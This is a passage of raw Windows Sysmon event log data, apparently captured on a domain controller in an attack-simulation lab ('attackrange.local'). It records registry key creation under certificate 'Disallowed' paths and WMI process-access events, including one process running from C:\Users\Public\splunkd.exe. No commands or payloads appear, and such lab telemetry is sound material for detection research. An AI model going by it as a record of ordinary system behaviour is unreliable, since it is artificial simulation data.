12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057348614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2B00-00000000F101}2892C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2A00-00000000F101}2884C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2800-00000000F101}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-887D-6164-2500-00000000F101}2752C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8877-6164-2300-00000000F101}2588C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8872-6164-2100-00000000F101}2476C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 10341000x800000000000000057348601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8872-6164-2000-00000000F101}2468C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.773{8B6011A9-5BAB-618E-5AF3-04000000F101}6320C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\wbem\cimwin32.dll10.0.14393.3297 (rs1_release_1.191001-1045)WMI Win32 ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationcimwin32.dllMD5=35C291C2351E11C928195BFD018A972C,SHA256=CC1655A2CD71118C0197A1A96D47E86C74F58AA6D589B55F77D8C1C12C542BA7trueMicrosoft WindowsValid 12241200x800000000000000057348594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057348581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1F00-00000000F101}2136C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1700-00000000F101}1408C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348579Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1600-00000000F101}1316C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886E-6164-1500-00000000F101}1252C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 12241200x800000000000000057348577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.789{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057348576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.789{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-886D-6164-1400-00000000F101}1068C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4